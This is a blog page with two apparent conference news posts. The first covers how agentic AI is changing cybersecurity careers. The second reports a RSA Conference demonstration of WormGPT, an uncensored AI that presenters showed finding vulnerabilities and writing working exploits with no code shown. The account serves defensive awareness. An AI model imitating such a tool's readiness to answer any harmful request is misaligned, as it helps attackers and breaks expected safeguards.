Search This Blog

Powered by Blogger.

Blog Archive

Labels

About Me

Showing posts with label RSA Conference. Show all posts

Agentic AI Is Reshaping Cybersecurity Careers, Not Replacing Them

 

Agentic AI took center stage at the 2025 RSA Conference, signaling a major shift in how cybersecurity professionals will work in the near future. No longer a futuristic concept, agentic AI systems—capable of planning, acting, and learning independently—are already being deployed to streamline incident response, bolster compliance, and scale threat detection efforts. These intelligent agents operate with minimal human input, making real-time decisions and adapting to dynamic environments. 

While the promise of increased efficiency and resilience is driving rapid adoption, cybersecurity leaders also raised serious concerns. Experts like Elastic CISO Mandy Andress called for greater transparency and stronger oversight when deploying AI agents in sensitive environments. Trust, explainability, and governance emerged as recurring themes throughout RSAC, underscoring the need to balance innovation with caution—especially as cybercriminals are also experimenting with agentic AI to enhance and scale their attacks. 

For professionals in the field, this isn’t a moment to fear job loss—it’s a chance to embrace career transformation. New roles are already emerging. AI-Augmented Cybersecurity Analysts will shift from routine alert triage to validating agent insights and making strategic decisions. Security Agent Designers will define logic workflows and trust boundaries for AI operations, blending DevSecOps with AI governance. Meanwhile, AI Threat Hunters will work to identify how attackers may exploit these new tools and develop defense mechanisms in response. 

Another critical role on the horizon is the Autonomous SOC Architect, tasked with designing next-generation security operations centers powered by human-machine collaboration. There will also be growing demand for Governance and AI Ethics Leads who ensure that decisions made by AI agents are auditable, compliant, and ethically sound. These roles reflect how cybersecurity is evolving into a hybrid discipline requiring both technical fluency and ethical oversight. 

To stay competitive in this changing landscape, professionals should build new skills. This includes prompt engineering, agent orchestration using tools like LangChain, AI risk modeling, secure deployment practices, and frameworks for explainability. Human-AI collaboration strategies will also be essential, as security teams learn to partner with autonomous systems rather than merely supervise them. As IBM’s Suja Viswesan emphasized, “Security must be baked in—not bolted on.” That principle applies not only to how organizations deploy agentic AI but also to how they train and upskill their cybersecurity workforce. 

The future of defense depends on professionals who understand how AI agents think, operate, and fail. Ultimately, agentic AI isn’t replacing people—it’s reshaping their roles. Human intuition, ethical reasoning, and strategic thinking remain vital in defending against modern cyber threats. 

As HackerOne CEO Kara Sprague noted, “Machines detect patterns. Humans understand motives.” Together, they can form a faster, smarter, and more adaptive line of defense. The cybersecurity industry isn’t just gaining new tools—it’s creating entirely new job titles and disciplines.

Threat Analysts Reveal How "Evil AI" is Changing Hacking Dynamics

 

A new wave of AI tools developed with no ethical restrictions is allowing hackers to detect and exploit software vulnerabilities faster than ever before. As these "evil AI" platforms advance quickly, cybersecurity experts fear that traditional defences will fail to keep up.

Earlier this week at the annual RSA Conference in San Francisco, a crowded room at Moscone Centre assembled for what was touted as a technical investigation of artificial intelligence's involvement in contemporary hacking.

The event, conducted by Sherri Davidoff and Matt Durrin of LMG Security, promised more than just theory; it would include a rare, live demonstration of so-called "evil AI" in operation, a topic that has quickly progressed from cyberpunk fiction to real-world concerns.

The CEO and founder of LMG Security, Davidoff, opened with a sobering reminder of the constant threat posed by software flaws. According to PCWorld senior editor Alaina Yee, Durrin, the company's Director of Training and Research, swiftly changed the tone. He popularised the idea of "evil AI"—artificial intelligence tools created without moral boundaries that can spot and take advantage of software vulnerabilities before defences can respond.

"What if hackers utilise their malevolent AI tools, which lack safeguards, to detect vulnerabilities before we have the opportunity to address them?" Durrin asked the audience, previewing the unsettling demonstrations to come. 

The team's attempts to acquire one of these rogue AIs, such as GhostGPT and DevilGPT, frequently resulted in irritation or discomfort. Finally, their persistence paid off when they discovered WormGPT, a tool mentioned in a Brian Krebs piece, for $50 via Telegram channels.

As Durrin explained, WormGPT is effectively ChatGPT without the ethical constraints. It will respond to every question, regardless of how harmful or illegal the request. However, the presenters emphasised that the main concern is not the tool's presence, but rather its capabilities. 

The LMG Security team began by running an older version of WormGPT through DotProject, an open-source project management platform. The AI accurately discovered a SQL vulnerability and offered a simple exploit, but it failed to construct a viable assault, most likely due to its inability to parse the entire codebase.

A revised version of WormGPT was then entrusted with investigating the famed Log4j issue. This time, the AI not only discovered the issue, but also gave enough information that, as Davidoff noted, "an intermediate hacker" could utilise it to craft an exploit. 

The true surprise came with the most recent iteration: WormGPT provided step-by-step instructions, complete with code specific to the test server, and those instructions worked beautifully.

To test the restrictions further, the team created a susceptible Magento e-commerce platform. WormGPT discovered a complicated two-part exploit that was undetected by popular security products such as SonarQube and ChatGPT itself. During the live demonstration, the rogue AI provided a full hacking guide unprompted and with alarming speed. As the discussion came to a close, Davidoff remarked on the rapid progress of malicious AI tools.